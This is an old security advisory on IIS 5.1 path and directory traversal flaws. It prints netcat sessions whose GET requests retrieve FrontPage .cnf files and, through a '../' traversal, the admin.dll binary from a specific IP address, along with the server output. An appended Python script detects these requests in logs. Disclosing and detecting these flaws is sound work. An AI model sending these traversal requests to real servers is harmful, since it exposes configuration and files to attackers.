
IIS path & directory traversal issues



12th Feb 2002 [SBWID-5092]
COMMAND

	IIS path & directory traversal issues

SYSTEMS AFFECTED

	Windows XP with IIS 5.1

PROBLEM

	In NtWaK0 [http://www.SafeHack.com] advisory :
	

	Identify WEB DIR installation. By sending this "GET
	/_vti_pvt/access.cnf" you can identify the web installation. As we all
	know, this is a helpful piece of information if someone is going to
	attack your web site. Multiple .cnf files are at cause.
	

	Exploits :

	========
	

	C\\Tool>nc -v -n 67.82.156.211 81

	(UNKNOWN) [67.82.156.211] 81 (?) open

	GET /_vti_pvt/access.cnf

	vti_encodingSR|utf8-nl

	RealmNameLAMER

	InheritPermissionsfalse

	PasswordDird\\\\inetpub\\\\wwwroot\\\\_vti_pvt

	

	There is another security issue with this too:
	"InheritPermissionsfalse". This will tell the security inheritance of
	that folder.
	

	C\\Tool>nc -v -n 67.82.156.211 81

	(UNKNOWN) [67.82.156.211] 81 (?) open

	GET /_vti_pvt/botinfs.cnf

	vti_encodingSR|utf8-nl

	D\\\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\Web Server Extensions\\\\

	40\\\\bots\\\\vinavbar\\\\vinavbar.infVW|vinavbar

	

	C\\Tool>nc -v -n 67.82.156.211 81

	(UNKNOWN) [67.82.156.211] 81 (?) open

	GET /_vti_pvt/bots.cnf

	vti_encodingSR|utf8-nl

	vinavbarVW|D\\\\\\\\Program\\\\ Files\\\\\\\\Common\\\\ Files\\\\\\\\Microsoft\\\\ Shared

	\\\\\\\\Web\\\\ Server\\\\ Extensions\\\\\\\\40\\\\\\\\bots\\\\\\\\vinavbar\\\\\\\\vinavbar.inf

	vinavbar E I info N D\\\\\\\\Program\\\\ Files\\\\\\\\Common\\\\ Files\\\\\\\\Microsoft

	\\\\ Shared\\\\\\\\Web\\\\ Server\\\\ Extensions\\\\\\\\40\\\\\\\\bots\\\\\\\\vinavbar

	\\\\\\\\fp4Avnb.dll

	

	

	-Also-
	

	

	Using GET /iishelp/common/colegal.htm you can access other files under
	the web structure. I did not have a chance to test it on files above the
	web structure. Like I said, I do not run IIS 5.1 but a friend does. One
	of these days I am going to buy more memory for some of my old box and
	

	 Exploits :

	 ========

	

	C\\Tool>nc -v -n 67.82.156.211 81

	(UNKNOWN) [67.82.156.211] 81 (?) open

	GET /iishelp/common/colegal.htm../../../../../_vti_pvt/access.cnf

	vti_encodingSR|utf8-nl

	RealmNameLAMER

	InheritPermissionsfalse

	PasswordDird\\\\inetpub\\\\wwwroot\\\\_vti_pvt

	writeto.cnf [Extracted From]

	http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/prodtechnol/office/reskit/fp98serk/appendixes/A_SPFILE.asp

	

	Back links for files that can be written to by users of  the  web,  such
	as Save Results Form handler result files. Files that can be written  to
	by users of the web have a looser  security  setting  than  regular  web
	content.
	

	C\\Tool>nc -v -n 67.82.156.211 81

	(UNKNOWN) [67.82.156.211] 81 (?) open

	GET /iishelp/common/colegal.htm../../../../../_vti_bin/_vti_adm/admin.dll

	MZ ?   ? + @a   ???   -!+?L-!This program cannot be run in DOS mode.

	$ -Q+Q?Q?Q?3,U?寮5T?Q>F?T9P?寮4S?寮;U?RichQ?

	PE  L??         _; a ?!???  ?   0      c?   ?        g ?   ?  ?       ?

	        P   ?  -  ?     ?  ?    ?  ?      ?    ?     (?  P    0  P?

	

	C\\Tool>nc -v -n 67.82.156.211 81

	(UNKNOWN) [67.82.156.211] 81 (?) open

	GET /_vti_pvt/linkinfo.cnf

	vti_encodingSR|utf8-nl

	javascript\\loadhelpfront();localstart.asp

	javascript\\activate(<%=iver%>);localstart.asp

	http\\//www.safehack.comindex.htm

	/iishelp/common/colegal.htmlocalstart.asp

	

SOLUTION

	None yet.
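
	A log check for the requests shown under PROBLEM, as an added example that is not part of the original advisory. The W3C log lines are constructed, and resolving dot segments with a POSIX path normaliser is an assumption, not a model of how IIS 5.1 parses the path.

```python
import posixpath
import re
from urllib.parse import unquote

# Resources the advisory shows being returned: FrontPage .cnf files and the admin DLL.
SENSITIVE = re.compile(r"^/_vti_pvt/[^/]+\.cnf$|^/_vti_bin/_vti_adm/", re.IGNORECASE)

# Constructed sample in W3C extended log format (addresses are documentation ranges).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2002-02-12 10:01:07 192.0.2.10 GET /default.htm 200
2002-02-12 10:01:09 192.0.2.44 GET /_vti_pvt/access.cnf 200
2002-02-12 10:01:15 192.0.2.44 GET /iishelp/common/colegal.htm../../../../../_vti_pvt/access.cnf 200
2002-02-12 10:01:21 192.0.2.44 GET /iishelp/common/colegal.htm../../../../../_vti_bin/_vti_adm/admin.dll 404
2002-02-12 10:01:30 192.0.2.10 GET /iishelp/common/colegal.htm 200
"""

def classify(uri):
    """Return findings for one request path; an empty list means nothing matched."""
    path = unquote(uri.split("?", 1)[0]).replace("\\", "/")
    findings = []
    # Catches plain ".." segments and ".." glued to a file name ("colegal.htm..").
    if any(seg.endswith("..") for seg in path.split("/")):
        findings.append("traversal")
    # Collapse the dot segments to see which resource the request resolves to.
    resolved = posixpath.normpath("/" + path.lstrip("/"))
    if SENSITIVE.search(resolved):
        findings.append("sensitive:" + resolved.lower())
    return findings

def scan(log_text):
    """Return (client, uri, served, findings) for every flagged log line."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for the rows that follow
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            findings = classify(row.get("cs-uri-stem", ""))
            if findings:
                served = row.get("sc-status", "").startswith("2")  # 2xx: content went out
                hits.append((row.get("c-ip"), row.get("cs-uri-stem"), served, findings))
    return hits

if __name__ == "__main__":
    for client, uri, served, findings in scan(SAMPLE_LOG):
        print(client, "SERVED" if served else "not served", ",".join(findings), uri)
```

	A hit with a 2xx status means the file was actually returned, so those lines are the ones to review first.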

